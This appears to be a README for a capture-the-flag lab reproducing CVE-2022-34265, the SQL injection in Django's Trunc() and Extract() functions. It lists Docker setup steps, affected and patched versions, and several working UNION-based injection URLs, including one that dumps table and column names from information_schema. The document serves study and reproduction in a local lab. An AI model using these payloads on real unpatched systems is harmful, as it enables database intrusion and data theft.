CTF_CVE-2022-34265

Description

An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.

How to use

Start

git clone https://github.com/coco0x0a/CTF_CVE-2022-34265
cd CVE-2022-34265
sudo docker-compose up -d

Check status

sudo docker ps

Remove

sudo docker-compose down

Affected Versions

  • Django>= 3.2, < 3.2.14

  • Django >= 4.0, < 4.0.6

Patched versions

  • Django 3.2.14

  • Django 4.0.6

Verification

Environment

  • Django 4.0.5
  • Python 3.8.13
  • MySQL 5.7

sql injection

using UNION

http://127.0.0.1:8000/extract/?lookup_name=year%20FROM%20start_datetime))%20OR%201=1%20UNION%20SELECT%201--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, 2, 3, 4, 5, 6, 7--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT "TEST", now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT CONCAT(table_name, '~', column_name), now(), now(), now(), now(), now(), now() FROM information_schema.columns--

image

Reference

https://github.com/aeyesec/CVE-2022-34265

https://github.com/ZhaoQi99/CVE-2022-34265

https://github.com/suksit/writeups/tree/main/secplayground/half-year-event-2022